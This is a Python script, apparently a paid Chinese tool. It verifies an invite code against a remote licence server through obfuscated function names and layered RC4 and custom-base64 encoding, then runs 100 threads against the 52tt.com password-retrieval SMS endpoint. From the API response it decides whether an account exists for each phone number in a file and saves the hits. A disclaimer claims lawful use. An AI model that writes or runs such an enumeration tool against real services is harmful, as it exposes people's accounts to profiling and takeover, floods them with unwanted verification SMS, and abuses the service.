import importlib
import sys
import subprocess
import time
import threading

# 定义需要检查的库及其版本（可选）
required_libraries = {
    "pandas": None,
    "aiohttp": None,
    "asyncio": None,
    "colorama": None,
    "requests": None,
    "json": None,  # 标准库，无需安装
    "hashlib": None,  # 标准库，无需安装
    "random": None,  # 标准库，无需安装
    "uuid": None,  # 标准库，无需安装
    "os": None,  # 标准库，无需安装
    "time": None,  # 标准库，无需安装
    "datetime": None,  # 标准库，无需安装
    "concurrent.futures": None,  # 需要安装
    "rich": None  # 需要安装
}

def check_libraries():
    missing_libraries = []
    for lib in required_libraries.keys():
        try:
            # 尝试导入库
            importlib.import_module(lib)
        except ImportError:
            missing_libraries.append(lib)
    return missing_libraries

def install_progress_bar():
    """安装进度条函数"""
    total_steps = 50  # 总进度步数
    for step in range(total_steps + 1):
        progress = int(step / total_steps * 100)
        bar_length = int(step / total_steps * 50)  # 进度条长度
        bar = "\033[94m#\033[0m" * bar_length + "-" * (50 - bar_length)  # 蓝色进度条
        print(f"\rInstalling[{bar}] {progress}%", end="")
        time.sleep(0.05)  # 模拟安装进度

def install_missing_libraries(missing_libraries):
    if not missing_libraries:
        print("All dependency libraries have been installed.")
        return

    print("Install missing libraries")
    for lib in missing_libraries:
        try:
            # 启动安装进度条
            progress_thread = threading.Thread(target=install_progress_bar)
            progress_thread.start()

            # 使用 pip 安装缺失的库
            subprocess.check_call([sys.executable, "-m", "pip", "install", lib])

            progress_thread.join()

            print(f"\rInstalled Library {lib}。" + " " * 70)  # 清除进度条残留
        except Exception as e:
            print(f"\rInstallation Library{lib} An error occurred during the process：{e}" + " " * 70)  # 清除进度条残留

def main():
    print("Check the running inventory\nHanging accelerator installation is faster")
    missing_libraries = check_libraries()

    if missing_libraries:
        print("The following libraries are not installed:")
        for lib in missing_libraries:
            print(f"- {lib}")
        install_missing_libraries(missing_libraries)
    else:
        print("The missing runtime library installation is complete. You can continue to use the program✅")

    # 在这里继续你的程序逻辑
    print("")

if __name__ == "__main__":
    main()


import time
import sys

# 定义ANSI颜色代码
class Colors:
    RESET = "\033[0m"  # 重置颜色
    BLUE = "\033[94m"  # 蓝色

def draw_nu77():
    # 定义放大后的“nu77”字符绘画
    nu77_art = [
        "                ______________                ",
        "               /                   \\               ",
        "              |                     |              ",
        "              |       ________      |              ",
        "              |      /        \\     |              ",
        "              |     |          |    |              ",
        f"              |     |    {Colors.BLUE}nu{Colors.RESET}    |    |              ",
        "              |     |          |    |              ",
        "              |      \\________/     |              ",
        "              |                     |              ",
        "              |        ____         |              ",
        "              |       /    \\        |              ",
        f"              |      |  {Colors.BLUE}77{Colors.RESET}  |       |              ",
        "              |       \\____/        |              ",
        "              |                     |              ",
        "               \\___________________/               "
    ]
    return "\n".join(nu77_art)

def loading_animation():
    for i in range(1):
        for line in draw_nu77().splitlines():
            sys.stdout.write("\r" + line)
            sys.stdout.flush()
            time.sleep(0.05)  # 将延迟时间从 0.2 秒改为 0.05 秒
        sys.stdout.write("\r" + " " * 80 + "\r")  # 清除当前行

if __name__ == "__main__":
    loading_animation()

import os

file_name = "邀请码.txt"
if not os.path.exists(file_name):
    with open(file_name, 'w') as file:
        file.write("null766")
    print(f"已生成文件 {file_name}")
else:
    pass

import requests
import json
import hashlib
import random
import uuid
import os
import time
import datetime

def get_device_id(file_path=".nu77"):
    if os.path.exists(file_path):
        with open(file_path, "r") as f:
            device_id = f.read().strip()
    else:
        device_id = str(uuid.uuid1())
        with open(file_path, "w") as f:
            f.write(device_id)
    return device_id

def ie7c24ef5790542daf0b8ede556880ff3(data: str) -> str:
    m = hashlib.md5()
    m.update(data.encode('utf-8'))
    return m.hexdigest()

def gb21c8ef7ad15eaf914dbb90c8b84c650(data, key):
    def ksa(key):
        key_len = len(key)
        schedule = list(range(256))
        j = 0
        for i in range(256):
            j = (j + schedule[i] + key[i % key_len]) % 256
            schedule[i], schedule[j] = schedule[j], schedule[i]
        return schedule

    def prga(schedule, data_len):
        i = j = 0
        stream = []
        for _ in range(data_len):
            i = (i + 1) % 256
            j = (j + schedule[i]) % 256
            schedule[i], schedule[j] = schedule[j], schedule[i]
            stream.append(schedule[(schedule[i] + schedule[j]) % 256])
        return stream

    def process(data, key):
        schedule = ksa(key)
        stream = prga(schedule, len(data))
        return bytes([d ^ s for d, s in zip(data, stream)])
    if isinstance(key, str):
        key = key.encode('utf-8')
    if isinstance(data, str):
        data = data.encode('utf-8')
    return process(data, key).decode('utf-8')
    
def me793c94a59dbd9ce53a6b5b320016d7d(data, key):
    def ksa(key):
        key_len = len(key)
        schedule = list(range(256))
        j = 0
        for i in range(256):
            j = (j + schedule[i] + key[i % key_len]) % 256
            schedule[i], schedule[j] = schedule[j], schedule[i]
        return schedule

    def prga(schedule, data_len):
        i = j = 0
        stream = []
        for _ in range(data_len):
            i = (i + 1) % 256
            j = (j + schedule[i]) % 256
            schedule[i], schedule[j] = schedule[j], schedule[i]
            stream.append(schedule[(schedule[i] + schedule[j]) % 256])
        return stream

    def process(data, key):
        schedule = ksa(key)
        stream = prga(schedule, len(data))
        return bytes([d ^ s for d, s in zip(data, stream)])
    if isinstance(key, str):
        key = key.encode('utf-8')
    if isinstance(data, str):
        data = data.encode('utf-8')
    return process(data, key)

def w82502fb2f2bf0221839aa107707a54e5(data):
    if isinstance(data, str):
        data = data.encode('utf-8')
    elif not isinstance(data, bytes):
        raise ValueError("Input must be of type str or bytes")
    return ''.join(f'{byte:02x}' for byte in data)

def y4ed77920c0ddfc5c9f9d0c3ff6829c72(hex_str):
    return bytes.fromhex(hex_str)

def x0317fbdd7f7e5af9e6fb513e26898ffb(data: str) -> str:
    base64_chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    byte_data = data.encode('utf-8')
    binary_data = ''.join(f'{byte:08b}' for byte in byte_data)
    base64_str = ""
    for i in range(0, len(binary_data), 6):
        chunk = binary_data[i:i+6]
        chunk = chunk.ljust(6, '0')
        index = int(chunk, 2)
        base64_str += base64_chars[index]
    while len(base64_str) % 4 != 0:
        base64_str += '='

    return base64_str

def v201d7e5929d19e5df2ed3894fee7264f(data: str) -> str:
    base64_chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    binary_data = ""
    data = data.rstrip('=')

    for c in data:
        index = base64_chars.index(c)
        binary_data += f'{index:06b}'
    byte_array = bytearray()
    for i in range(0, len(binary_data), 8):
        byte = binary_data[i:i+8]
        if len(byte) == 8:
            byte_array.append(int(byte, 2))
    return byte_array.decode('utf-8')

def hf33dd17a8381b27ebbef9fd68f273572(data: str, base64_chars: str) -> str:
    byte_data = data.encode('utf-8')
    binary_data = ''.join(f'{byte:08b}' for byte in byte_data)
    base64_str = ""
    for i in range(0, len(binary_data), 6):
        chunk = binary_data[i:i+6]
        chunk = chunk.ljust(6, '0')
        index = int(chunk, 2)
        base64_str += base64_chars[index]
    while len(base64_str) % 4 != 0:
        base64_str += '='

    return base64_str

def ef52bd1682d5973253708aaed328ed3b9(data: str, base64_chars: str) -> str:
    binary_data = ""
    data = data.rstrip('=')

    for c in data:
        index = base64_chars.index(c)
        binary_data += f'{index:06b}'
    byte_array = bytearray()
    for i in range(0, len(binary_data), 8):
        byte = binary_data[i:i+8]
        if len(byte) == 8:
            byte_array.append(int(byte, 2))
    return byte_array.decode('utf-8')

WEIURL = "http://wy.llua.cn/v2/"
currentVersion = "20" #当前版本，用于检查更新

notice_data = requests.post(WEIURL + "92e76953424ce4c5f19bf23391f370e9",hf33dd17a8381b27ebbef9fd68f273572(x0317fbdd7f7e5af9e6fb513e26898ffb(w82502fb2f2bf0221839aa107707a54e5(hf33dd17a8381b27ebbef9fd68f273572(hf33dd17a8381b27ebbef9fd68f273572(w82502fb2f2bf0221839aa107707a54e5(me793c94a59dbd9ce53a6b5b320016d7d("id=wz0YqCPAjSP","j00191763661aa46d5fdb356086c01c3c6d")),"e3FvZdiqJYBAtoU+a96s2X1OMWcrnHjT/KSC7VQLlbzmxRukGDN0Ewf4y5h8gPIp"),"6gQ4erUcBdjhIw0vGR5qD2LZCE+A/bilFxM391X8nJtsyuTfSNmpoVzKaHPWOkY7"))),"rA82d4HQ3MTGxy0hJut5Epa+9UIlP61N7Xqn/bVKvCjisckzOSDfwLBeRogFYWZm"))
if notice_data.status_code == 200:
	notice_json = json.loads(gb21c8ef7ad15eaf914dbb90c8b84c650(y4ed77920c0ddfc5c9f9d0c3ff6829c72(notice_data.text),"g2b7ceaca8d00accf2ed866"))
	if notice_json["code"] == 56287:
	    print("")
	    print(notice_json["msg"]["app_gg"])
	else:
		print(notice_json["msg"])
else:
	print("network anomaly")

print("\n")

print("")
ini_data = requests.post(WEIURL + "92e76953424ce4c5f19bf23391f370e9",hf33dd17a8381b27ebbef9fd68f273572(x0317fbdd7f7e5af9e6fb513e26898ffb(w82502fb2f2bf0221839aa107707a54e5(hf33dd17a8381b27ebbef9fd68f273572(hf33dd17a8381b27ebbef9fd68f273572(w82502fb2f2bf0221839aa107707a54e5(me793c94a59dbd9ce53a6b5b320016d7d("id=14pkLCm15BE","j00191763661aa46d5fdb356086c01c3c6d")),"e3FvZdiqJYBAtoU+a96s2X1OMWcrnHjT/KSC7VQLlbzmxRukGDN0Ewf4y5h8gPIp"),"6gQ4erUcBdjhIw0vGR5qD2LZCE+A/bilFxM391X8nJtsyuTfSNmpoVzKaHPWOkY7"))),"rA82d4HQ3MTGxy0hJut5Epa+9UIlP61N7Xqn/bVKvCjisckzOSDfwLBeRogFYWZm"))
if ini_data.status_code == 200:
	ini_json = json.loads(gb21c8ef7ad15eaf914dbb90c8b84c650(y4ed77920c0ddfc5c9f9d0c3ff6829c72(ini_data.text),"g2b7ceaca8d00accf2ed866"))	
	if ini_json["code"] == 32421:
	    if ini_json["msg"]["version"] == currentVersion:
	        print("")
	    else:
	        print("There's a new version")
	        print("Current version:" + currentVersion)
	        print("current version:" + ini_json["msg"]["version"])
	        print("update:" + ini_json["msg"]["updateshow"])
	        print("refresh address：" + ini_json["msg"]["updateurl"])
	        if ini_json["msg"]["updatemust"] == "y":
	    	    print("This update is a mandatory update, please update after use!\n免责声明：本程序仅用于合法、合规的信息查询与测试，严禁用于任何非法、违规或侵犯他人隐私的活动。使用者需自行承担因使用本程序而产生的一切法律责任。'")
	    	    exit()
	else:
		print(ini_json["msg"])
else:
	print("network anomaly")

print("\n")

# 邀请码文件路径
invitation_code_file = "邀请码.txt"
if os.path.exists(invitation_code_file):
    with open(invitation_code_file, "r") as file:
        q8f02b1e2b00ec851d35639980d7216f8 = file.read().strip()
    print(f"已成功读取邀请码文件，邀请码为：{q8f02b1e2b00ec851d35639980d7216f8}")
else:
    q8f02b1e2b00ec851d35639980d7216f8 = input("邀请码null766\n请输入邀请码：")
    with open(invitation_code_file, "w") as file:
        file.write(q8f02b1e2b00ec851d35639980d7216f8)
    print("邀请码已保存，下次运行将直接读取。\n如果输错邀请码请在本脚本所在的文件夹里删除邀请码文件名字为邀请码.txt")

while True:
    sd6431475af291445181bc993b69c922b = get_device_id()
    sacb8f721c7ab0df463a7bc7b64088f98 = int(time.time())
    df66f6492c0773015e3e8a473e4f8d8ad = random.randint(100000, 999999)
    w72b0832ab80496442cb9ec5528a7385e = ie7c24ef5790542daf0b8ede556880ff3("kami=" + q8f02b1e2b00ec851d35639980d7216f8 + "&markcode=" + sd6431475af291445181bc993b69c922b + "&t=" + str(sacb8f721c7ab0df463a7bc7b64088f98) + "&dda55d1c2c79afba538a4")
    sf277078d7f2cc9d6dfeabf1bd3de1e53 = requests.post(WEIURL + "92e76953424ce4c5f19bf23391f370e9",hf33dd17a8381b27ebbef9fd68f273572(x0317fbdd7f7e5af9e6fb513e26898ffb(w82502fb2f2bf0221839aa107707a54e5(hf33dd17a8381b27ebbef9fd68f273572(hf33dd17a8381b27ebbef9fd68f273572(w82502fb2f2bf0221839aa107707a54e5(me793c94a59dbd9ce53a6b5b320016d7d("id=zI29rX9wucC&kami=" + q8f02b1e2b00ec851d35639980d7216f8 + "&markcode=" + sd6431475af291445181bc993b69c922b + "&t=" + str(sacb8f721c7ab0df463a7bc7b64088f98) + "&sign=" + w72b0832ab80496442cb9ec5528a7385e + "&value=" + str(df66f6492c0773015e3e8a473e4f8d8ad) +"","j00191763661aa46d5fdb356086c01c3c6d")),"e3FvZdiqJYBAtoU+a96s2X1OMWcrnHjT/KSC7VQLlbzmxRukGDN0Ewf4y5h8gPIp"),"6gQ4erUcBdjhIw0vGR5qD2LZCE+A/bilFxM391X8nJtsyuTfSNmpoVzKaHPWOkY7"))),"rA82d4HQ3MTGxy0hJut5Epa+9UIlP61N7Xqn/bVKvCjisckzOSDfwLBeRogFYWZm"))
    if sf277078d7f2cc9d6dfeabf1bd3de1e53.status_code == 200:
        o1a942076ca0f7f1f43305154249fd262 = json.loads(v201d7e5929d19e5df2ed3894fee7264f(ef52bd1682d5973253708aaed328ed3b9(ef52bd1682d5973253708aaed328ed3b9(v201d7e5929d19e5df2ed3894fee7264f(ef52bd1682d5973253708aaed328ed3b9(gb21c8ef7ad15eaf914dbb90c8b84c650(y4ed77920c0ddfc5c9f9d0c3ff6829c72(sf277078d7f2cc9d6dfeabf1bd3de1e53.text),"n5b88518cb8eac98684bb86827b3f69bfba2d"),"tDx6rQaq8JMecl3L0uiPw/XZN2njgSsYRICOp97zmUvK5dFkho1fWGy+4VHTABbE")),"XE4G7zIWwOHZotRcYyeNhqn8AUsuM3jbdBQ0V52Pp+6JflKxLm/a9DCig1rTSFkv"),"GVEJ5yDQIaiu/xsUmzHvNFhYCoKkgWpqb918Z+L4Xfrj3t7PedAw02MS6nlOcRBT")))
        if o1a942076ca0f7f1f43305154249fd262["zf3f7c82fba03498038580cec9005b9ad"]==54426 and o1a942076ca0f7f1f43305154249fd262["z0c79155bd1775813a1ac5ccf82a6f677"]["w02fc9d67ee8fc6757245415c3cd961ef"]=="1937ccb2a7bcfb45e2f24999de6d4a0f":
            if o1a942076ca0f7f1f43305154249fd262["p6f4900de562bd61a04fb70ce44543f5d"]-sacb8f721c7ab0df463a7bc7b64088f98>30 or o1a942076ca0f7f1f43305154249fd262["p6f4900de562bd61a04fb70ce44543f5d"]-sacb8f721c7ab0df463a7bc7b64088f98<-30:
                print("The equipment is out of time")
            else:
                if o1a942076ca0f7f1f43305154249fd262["z0c79155bd1775813a1ac5ccf82a6f677"]["f7bc85464"] != ie7c24ef5790542daf0b8ede556880ff3(""+w72b0832ab80496442cb9ec5528a7385e+""+"dda55d1c2c79afba538a4"+""+str(o1a942076ca0f7f1f43305154249fd262["zf3f7c82fba03498038580cec9005b9ad"])+"x6780") or o1a942076ca0f7f1f43305154249fd262["z0c79155bd1775813a1ac5ccf82a6f677"]["e1078ca31aa"] != ie7c24ef5790542daf0b8ede556880ff3(""+w72b0832ab80496442cb9ec5528a7385e+""+str(sacb8f721c7ab0df463a7bc7b64088f98)+""+"dda55d1c2c79afba538a4"+""+str(o1a942076ca0f7f1f43305154249fd262["z0c79155bd1775813a1ac5ccf82a6f677"]["ge4f17ad5531a8bd01eef3c03d7ecdef3"])+"v69df85f3") or o1a942076ca0f7f1f43305154249fd262["z0c79155bd1775813a1ac5ccf82a6f677"]["dd227bb625362"] != ie7c24ef5790542daf0b8ede556880ff3(""+str(sacb8f721c7ab0df463a7bc7b64088f98)+""+str(sacb8f721c7ab0df463a7bc7b64088f98)+""+w72b0832ab80496442cb9ec5528a7385e+"l49dea8") or o1a942076ca0f7f1f43305154249fd262["z0c79155bd1775813a1ac5ccf82a6f677"]["rb4195f4d45b510"] != ie7c24ef5790542daf0b8ede556880ff3(""+"dda55d1c2c79afba538a4"+""+str(sacb8f721c7ab0df463a7bc7b64088f98)+""+str(sacb8f721c7ab0df463a7bc7b64088f98)+""+str(sacb8f721c7ab0df463a7bc7b64088f98)+"n0e28a35e") or o1a942076ca0f7f1f43305154249fd262["z0c79155bd1775813a1ac5ccf82a6f677"]["se37246f5"] != ie7c24ef5790542daf0b8ede556880ff3(""+str(df66f6492c0773015e3e8a473e4f8d8ad)+""+str(o1a942076ca0f7f1f43305154249fd262["p6f4900de562bd61a04fb70ce44543f5d"])+""+str(o1a942076ca0f7f1f43305154249fd262["zf3f7c82fba03498038580cec9005b9ad"])+"z08217c"):
                    print("Validation failure")
                else:
                    if o1a942076ca0f7f1f43305154249fd262["z0c79155bd1775813a1ac5ccf82a6f677"]["b3e6ce4be8b579d68f6c419c76704c859"] == "single":
                        print("\n" + o1a942076ca0f7f1f43305154249fd262["z0c79155bd1775813a1ac5ccf82a6f677"]["af88913f1e69e7a40c2dbf31425049ff5"])
                    else:
                        print("\n" + datetime.datetime.fromtimestamp(o1a942076ca0f7f1f43305154249fd262["z0c79155bd1775813a1ac5ccf82a6f677"]["kd00e276eef309d3a6586d2a92ef995f6"]).strftime('免责声明：本程序仅用于合法、合规的信息查询与测试，严禁用于任何非法、违规或侵犯他人隐私的活动。使用者需自行承担因使用本程序而产生的一切法律责任。'))
                    break
        else:
            print(o1a942076ca0f7f1f43305154249fd262["z0c79155bd1775813a1ac5ccf82a6f677"])
    else:
        print("network anomaly")

    
import requests
import threading
from queue import Queue

# 全局变量，用于存储已经验证过的手机号
validated_numbers = set()
# 存储要验证的手机号队列
phone_number_queue = Queue()

# 从文件中读取手机号并加入队列
def read_phone_numbers_from_file(file_path):
    try:
        with open(file_path, 'r') as file:
            for line in file:
                phone_number_queue.put(line.strip())
    except FileNotFoundError:
        print(f"找不到文件 {file_path}，请将包含手机号的文件名改为 手机号.txt 后重新运行程序。")
        exit(1)

# 验证手机号的函数
def validate_phone_number(uid):
    while not phone_number_queue.empty():
        mobile = phone_number_queue.get()
        if mobile in validated_numbers:
            continue

        url = f"https://api.52tt.com/security/verifycode/sms?callback=mf_1743343546128&pageName=retrieve-password&padding=86&uid={uid}&version=104792064&os_type=1&platform=1&app=723898056&game_block=1&apk_channel=B59881572.tt_n&mobile={mobile}&act=5&type=3&token="
        headers = {
            "Host": "api.52tt.com",
            "Connection": "keep-alive",
            "sec-ch-ua-platform": "Android",
            "User-Agent": "Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaN8-00/012.002; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.0 Mobile Safari/533.4 3gpp-gba",
            "sec-ch-ua": '"Chromium";v="130", "Android WebView";v="130", "Not?A_Brand";v="99"',
            "sec-ch-ua-mobile": "?1",
            "Accept": "*/*",
            "X-Requested-With": "mark.via",
            "Sec-Fetch-Site": "same-site",
            "Sec-Fetch-Mode": "no-cors",
            "Sec-Fetch-Dest": "script",
            "Referer": "https://appcdn.52tt.com/",
            "Accept-Encoding": "gzip, deflate, br, zstd",
            "Accept-Language": "zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7"
        }

        try:
            response = requests.get(url, headers=headers)
            if response.status_code == 200:
                # 解析响应内容，假设响应是JSON格式
                response_text = response.text
                if "code" in response_text:
                    code = response_text.split('{"code":')[1].split(',')[0]
                    if code == "0":
                        print(f"手机号 {mobile} 对应的账户存在✅")
                        with open('验证成功.txt', 'a') as f:
                            f.write(mobile + '\n')
                    else:
                        print(f"⚠️手机号 {mobile} 对应的账户不存在⚠️")
                validated_numbers.add(mobile)
            else:
                print(f"请求失败，状态码: {response.status_code}，手机号: {mobile}")
        except Exception as e:
            print(f"请求手机号 {mobile} 时发生异常: {e}")

        phone_number_queue.task_done()

# 主函数
def main():
    uid = input("请输入TT号: ")
    file_path = "手机号.txt"  
    read_phone_numbers_from_file(file_path)

    threads = []
    for _ in range(100):
        t = threading.Thread(target=validate_phone_number, args=(uid,))
        t.daemon = True  # 设置为守护线程，主线程结束时子线程自动结束
        t.start()
        threads.append(t)

    phone_number_queue.join()  # 等待队列中的所有任务完成

    for t in threads:
        t.join()

if __name__ == "__main__":
    main()
